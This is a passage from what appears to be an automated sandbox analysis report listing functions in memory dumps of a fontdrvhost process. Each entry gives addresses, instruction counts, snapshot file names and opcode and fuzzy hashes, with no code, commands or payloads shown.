                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d27b5622238290f82de414551dd3ce0e43f05951a7ad42b9dc8ac687f7f21658
                                                                    • Instruction ID: 37cc76f8f67e9b4998d7278ecc8276da5469c6945bc6a00c3c12513269e74964
                                                                    • Opcode Fuzzy Hash: d27b5622238290f82de414551dd3ce0e43f05951a7ad42b9dc8ac687f7f21658
                                                                    • Instruction Fuzzy Hash: 0C519070A09A4D9FCF84EF58D494AED7BF1FF58315B0501AAE409E7261D774E990CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA15BE8 Relevance: .1, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 76693cc843499dff62b5017cd0e78a36ea2667865f68f9e5256d12c8d45ca85e
                                                                    • Instruction ID: 0015dcbb381fda84d3b28bcfa7c46fc5af2033f5cbe50824ece119b1b77b4da9
                                                                    • Opcode Fuzzy Hash: 76693cc843499dff62b5017cd0e78a36ea2667865f68f9e5256d12c8d45ca85e
                                                                    • Instruction Fuzzy Hash: CD4187B0A0492C8FDBA4DF18C894BE9B7F0EB68305F1041EAD10EE3295DB756AC48F45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA68389 Relevance: .1, Instructions: 108COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0021aa7cbee3fb0d9d03a03f20f1bd0361a3a8f2401bd12223807bb16167c28f
                                                                    • Instruction ID: 9126a1ff75d8f1c3892f89cd9c7b08198a138f49c340b25df246f8b5b22b67bf
                                                                    • Opcode Fuzzy Hash: 0021aa7cbee3fb0d9d03a03f20f1bd0361a3a8f2401bd12223807bb16167c28f
                                                                    • Instruction Fuzzy Hash: 7E419F70A0A64DCFEBA5EB64C4A97A87BB1FF15310F0541B6D40DC32E2DE786A84CB01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA32455 Relevance: .1, Instructions: 100COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c873852c8cfef55c667f62d94f119e98de557d4a1abfe4185f9f3c2a3d40ec8
                                                                    • Instruction ID: 66478cf962063eeeff441577007afc17ba8758fa8b749d4fedaa206c34de4ab6
                                                                    • Opcode Fuzzy Hash: 6c873852c8cfef55c667f62d94f119e98de557d4a1abfe4185f9f3c2a3d40ec8
                                                                    • Instruction Fuzzy Hash: 4A310832A0965E8FDB55FFACD8E59E97BE0FF11318B0802B7D459CA092DE31A445C740
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10C25 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feadd5f3ed811bf746adad8455719fb3a8b096feebf0be681ac67250bf3655ec
                                                                    • Instruction ID: 284e728ef956570969c66901c45aebbcb0aa434e0f65fd9909cf090360536080
                                                                    • Opcode Fuzzy Hash: feadd5f3ed811bf746adad8455719fb3a8b096feebf0be681ac67250bf3655ec
                                                                    • Instruction Fuzzy Hash: A2315B35B0E68E8BE771ABA8C8212FDB760EF41310F05567BC495971E2CBB82605CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA28799 Relevance: .1, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1ddbbd2381e3bfdc8ca596a819513303e729034da7161904b9e12ab6aaba651
                                                                    • Instruction ID: 7432a3b4b7dfb934ba99c2b2c40ec20674abcfedb05fe8c63557558ba2b7220b
                                                                    • Opcode Fuzzy Hash: c1ddbbd2381e3bfdc8ca596a819513303e729034da7161904b9e12ab6aaba651
                                                                    • Instruction Fuzzy Hash: E5318E30A1964D8FDB54DF58C8A5AEE7BF1FF58314F06026AE849E3291CB74E940CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5B613 Relevance: .1, Instructions: 85COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2cca38ddba03cf9a8ec44b1f2999655855ec486fefb1f535384a4a76a8ac47b4
                                                                    • Instruction ID: 28763b2d05daa8eab81669e8eb38d7a9ee5e4684f6d49285fe157c3648bbc719
                                                                    • Opcode Fuzzy Hash: 2cca38ddba03cf9a8ec44b1f2999655855ec486fefb1f535384a4a76a8ac47b4
                                                                    • Instruction Fuzzy Hash: 95315C70E19A4D8FDB94EFD8C4A5AACBBF1FF58301F450179D409D32A5DAB46981CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA15D41 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b5a0baa8f5dd338e358dc8ff2bc3a874cf52208aca2c85c73d9bb3487e437ad
                                                                    • Instruction ID: 6efc48f67c9d504063f17ccf513f404440c484986cf579aaf627afe47f80fdff
                                                                    • Opcode Fuzzy Hash: 0b5a0baa8f5dd338e358dc8ff2bc3a874cf52208aca2c85c73d9bb3487e437ad
                                                                    • Instruction Fuzzy Hash: B431B870A0491C8FCFA8DF18C854BE9B3F1EB68305F1041EAD10EE32A5DA75AA84CF45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1C4A8 Relevance: .1, Instructions: 79COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 903c70220e01420ed492c987d3db88fa00edd6c1f8691b28993fab26b69ede54
                                                                    • Instruction ID: 99680d8786faf20331e6cd5e8022ba9e21485e041040105a991c7b8e2fecea2d
                                                                    • Opcode Fuzzy Hash: 903c70220e01420ed492c987d3db88fa00edd6c1f8691b28993fab26b69ede54
                                                                    • Instruction Fuzzy Hash: 5F31DC70E0962D8EEBB4EB54C8587F876F1EF55701F4110F9D04DA6691DAB86BC48F01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA111A2 Relevance: .1, Instructions: 74COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 874daa2425092e849b98068fbe8491235e27b79726afbb59b75cd16d5a58652b
                                                                    • Instruction ID: 4e8b2d31340e8424bb7fa14b153fb2dfd1c4fff1cc96bf3e318171d8bdcec7cc
                                                                    • Opcode Fuzzy Hash: 874daa2425092e849b98068fbe8491235e27b79726afbb59b75cd16d5a58652b
                                                                    • Instruction Fuzzy Hash: A821E930A1891E8FEB94EBA8C8949BDB7F1FF28300B11057AD419D72A5DB74A941CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5AFD9 Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 61f3840982e0c7f5ea131815a9ebede10ac20086c0d136af40d49b466d88c0ff
                                                                    • Instruction ID: 0ed936b4c1f749bda66cc8f799b72e91ef8d765b855d62c08cfc351ca11c3b82
                                                                    • Opcode Fuzzy Hash: 61f3840982e0c7f5ea131815a9ebede10ac20086c0d136af40d49b466d88c0ff
                                                                    • Instruction Fuzzy Hash: 2A11063190858D8FCF91EFA8C8A59EC7BB0FF14300F0501E6D45DC71A2CA74AA40CB10
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA69DA1 Relevance: .1, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10d2ffdba93211575631726eb6d5cc443a8555724fe004a72b2e4c727d4bb858
                                                                    • Instruction ID: 388d8cab4ed156466795824d1fe972bd86b7525f313d9306313598239a9693c5
                                                                    • Opcode Fuzzy Hash: 10d2ffdba93211575631726eb6d5cc443a8555724fe004a72b2e4c727d4bb858
                                                                    • Instruction Fuzzy Hash: A4111C6544E3C99FDB439B748C352D47FB0AF13224F0A01DBE894CB0A3D26D5A5AD722
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA324A0 Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8d6ae5e99cab87f608016c3f029b630e15d1f01a017cf3f25e9a44b3c35e4cd8
                                                                    • Instruction ID: 7209878f5f9167a69cce637485e407ff43ed0933811355bdfa5d2ce6db1f3e84
                                                                    • Opcode Fuzzy Hash: 8d6ae5e99cab87f608016c3f029b630e15d1f01a017cf3f25e9a44b3c35e4cd8
                                                                    • Instruction Fuzzy Hash: 53119131A08A4D8FDF85EFA8C899AEE7BF0FF54305F0401AAD41DC7151DA30A554CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1C66E Relevance: .1, Instructions: 62COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30a68085a44d1b654a5b9e7dcb236b627966d64d9156d62b467fc615dca8df6d
                                                                    • Instruction ID: 403bbc5639b1e0e273bba71fd6d3180868a2b6b6d3268f6e621205428591d448
                                                                    • Opcode Fuzzy Hash: 30a68085a44d1b654a5b9e7dcb236b627966d64d9156d62b467fc615dca8df6d
                                                                    • Instruction Fuzzy Hash: B921B530E1952D8EEBA4EB54C8987EDB2F1FF55301F5410EAC04DA66A1DAB86AC08F01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1C3F7 Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 7ceb97c697304d05428d772a3fa5abf6b601bf1fc05521eb88c6f5e50f1f6271
                                                                    • Instruction ID: b9af83af9b1250780ba663e9ecce51698cde214dd583b0a262a56040bf0f0b58
                                                                    • Opcode Fuzzy Hash: 7ceb97c697304d05428d772a3fa5abf6b601bf1fc05521eb88c6f5e50f1f6271
                                                                    • Instruction Fuzzy Hash: A421F770E0D52D8EEBB0DB54C8983FDB2B1EF95300F4110E9C04DAA291DABC2B808F41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA6A406 Relevance: .1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 950f6e42bafe18b8e12865414efc393a42e473b124a2d77634e2b6a032712ad6
                                                                    • Instruction ID: 70503b9b2f6b35a722a4711cbcc5d903cfec1c8e8979b30ca223aa933dfc1cc0
                                                                    • Opcode Fuzzy Hash: 950f6e42bafe18b8e12865414efc393a42e473b124a2d77634e2b6a032712ad6
                                                                    • Instruction Fuzzy Hash: 4121E8B0E0961DCFDB68DB98D8A95ED77B1FF58305F11013ED00AA3295CB786906CB00
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA6A72D Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9714a707d160ecc646f928f60b10ea25a89de3fb5c3a83a8f7d1eca682c2e46e
                                                                    • Instruction ID: d3a5e8a0cb79e87f61484a68bf710c6f470141d2d434d81ff3d5370c80ab0fce
                                                                    • Opcode Fuzzy Hash: 9714a707d160ecc646f928f60b10ea25a89de3fb5c3a83a8f7d1eca682c2e46e
                                                                    • Instruction Fuzzy Hash: BA11E572A0954DCFDF94EF68C4A59EC7BB0FF65310F0501A6E00DC71A2DA71AA80CB40
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA10C40 Relevance: .1, Instructions: 56COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA10000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba10000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 59fe659a0e7615bd8a75495e56333b1b17365886a454297e14fabf15ec6c9ce5
                                                                    • Instruction ID: 744442af3a1a31f3c44cd5ebe9e3665348088bc673d49e99782f726e61eef2b8
                                                                    • Opcode Fuzzy Hash: 59fe659a0e7615bd8a75495e56333b1b17365886a454297e14fabf15ec6c9ce5
                                                                    • Instruction Fuzzy Hash: F9112B35B0E69E8AF722EB68C8202EEB760EF41710F054677D495972E2CF782205CF85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA6832D Relevance: .1, Instructions: 53COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d6ed4de2593f6dc551e8f1c39706bf0d5811396259957edd4a7cbb6056152135
                                                                    • Instruction ID: 5b358038cc4e93f1b2688acf53fbdc7d20a8af1df2ee7e2ae27f01177d8bf0a6
                                                                    • Opcode Fuzzy Hash: d6ed4de2593f6dc551e8f1c39706bf0d5811396259957edd4a7cbb6056152135
                                                                    • Instruction Fuzzy Hash: 05119171A0E68ECFEB61ABA488656E87BA0FF15304F0944F7E45CC61E2DA786684C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA660F9 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8b6974ffcc196cff5232382b01deab648dbfc727668c4f788cc3aa35fe31e9e2
                                                                    • Instruction ID: 1a6f79f392363495c0d63ed567c0b9d77ebd18bbc4033029f99b02b393dee04c
                                                                    • Opcode Fuzzy Hash: 8b6974ffcc196cff5232382b01deab648dbfc727668c4f788cc3aa35fe31e9e2
                                                                    • Instruction Fuzzy Hash: 87111C7090868D8FCF95EF68C859AE97BF0FF29300F05019BE459D72A1D7749554CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2818D Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3fc2b2737936decf86b66ed1af78389a234cbb3cc790eb781272f3bc23760d09
                                                                    • Instruction ID: 455c58d550d43b2a6de8ae58f9f99ea5e75cbdb40e93fa3c4c74e24e56651b9a
                                                                    • Opcode Fuzzy Hash: 3fc2b2737936decf86b66ed1af78389a234cbb3cc790eb781272f3bc23760d09
                                                                    • Instruction Fuzzy Hash: 07016861E8F64D4AE710AF64D8212FC77E0EF41320F064173E518921D3DE7866068351
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA66239 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac8ffa793b34ba38e5f28516172369dd5e8d96f396beb0552142801e6d0d6626
                                                                    • Instruction ID: d90da9b552f37ceca207e9e8c50adf2cf8ddc7a8fafb52de69174e1fbfe5da1e
                                                                    • Opcode Fuzzy Hash: ac8ffa793b34ba38e5f28516172369dd5e8d96f396beb0552142801e6d0d6626
                                                                    • Instruction Fuzzy Hash: B3112A70908A8D8FDF85EF68C859AE97BF0FF69300F0501AAE448D72A1DB74D554CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA28931 Relevance: .0, Instructions: 50COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA28000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA28000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba28000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1885ce69829ea3964f73f8b373fa9ed5783b9eca8b7ae1fc6edd9c37241f82b7
                                                                    • Instruction ID: 155fe730da7e88997ad247b2896edcadac8237875c2ef1c9666669f068094d5d
                                                                    • Opcode Fuzzy Hash: 1885ce69829ea3964f73f8b373fa9ed5783b9eca8b7ae1fc6edd9c37241f82b7
                                                                    • Instruction Fuzzy Hash: AE014C7095968D8FCB85DF18C892ADD3BE0FF18714F0501AAE849C3251D734E950CB82
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5B039 Relevance: .0, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6b3dac824fc9754b4fcece005985f575f697184a7ae045991fcb0f27998eb6b8
                                                                    • Instruction ID: 81534afb0527442f87ffe2270dfdbdd3b0816acaeefc7ec49eae00981073bce1
                                                                    • Opcode Fuzzy Hash: 6b3dac824fc9754b4fcece005985f575f697184a7ae045991fcb0f27998eb6b8
                                                                    • Instruction Fuzzy Hash: 6F112E70908A8D8FDF85EF68C899AAD7BF0FF28301F0505AAD459C7161D7749554CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA2FA78 Relevance: .0, Instructions: 48COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA2B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba2b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 812c0ba73054f6f1f739a91ca5263449c9c06e83ae0784cc343d14cf8cdbc50f
                                                                    • Instruction ID: 9aab41b4866d6af7ee4425528c75a7d3a3d888248e3045d8bec63d954f6a8a12
                                                                    • Opcode Fuzzy Hash: 812c0ba73054f6f1f739a91ca5263449c9c06e83ae0784cc343d14cf8cdbc50f
                                                                    • Instruction Fuzzy Hash: F301A27194E3CA4FDB539FB489606D83FB0BF13250F4A01EBE494C70A3EA695A19C712
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA66A19 Relevance: .0, Instructions: 47COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fe5074bde4eceff5e98bde0cf86726f119bcb0179e08a5519ecc6aadaf6196d7
                                                                    • Instruction ID: d91745f7d68881cf6644635b9ba67d4d317094d3f8997a2bbaa2921d9b661647
                                                                    • Opcode Fuzzy Hash: fe5074bde4eceff5e98bde0cf86726f119bcb0179e08a5519ecc6aadaf6196d7
                                                                    • Instruction Fuzzy Hash: 1A014C7090864D8FCF95EF68C858AEA7BF0FF69300F05019AE418D72A2DB749954CB80
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5D7D9 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA5A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA5A000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba5a000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ab13d64d09cb530896a0c4cabc34fbefc85f58ca0f08f3756fe62e965b5e4a63
                                                                    • Instruction ID: aa2f1cce5d965b91a5c04d740ce4163fb4712c9cb5cdb145ef5b82b686e6eae0
                                                                    • Opcode Fuzzy Hash: ab13d64d09cb530896a0c4cabc34fbefc85f58ca0f08f3756fe62e965b5e4a63
                                                                    • Instruction Fuzzy Hash: 0D015E3090968C8FCF45EF68C869AD97FB0FF29304F0501AAE459C71A1DB74AA54CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA1C623 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.1845074702.00007FFD9BA1B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA1B000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_9_2_7ffd9ba1b000_fontdrvhost.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 965526086f8611fe5ebdf91fd2749057533124fb331b32f19c1ca7880f3b7cb1
                                                                    • Instruction ID: e6fead0fe8045d220411cbbb937cf24d6b8c07e7006c33583dc8eadcd91f250a
                                                                    • Opcode Fuzzy Hash: 965526086f8611fe5ebdf91fd2749057533124fb331b32f19c1ca7880f3b7cb1
                                                                    • Instruction Fuzzy Hash: 6D11D630E0952D8EEBB4DB44C9987B9B2B1EF91701F4550F9D04DAA2A1DAB86BC4CF01
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00007FFD9BA5CB69 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
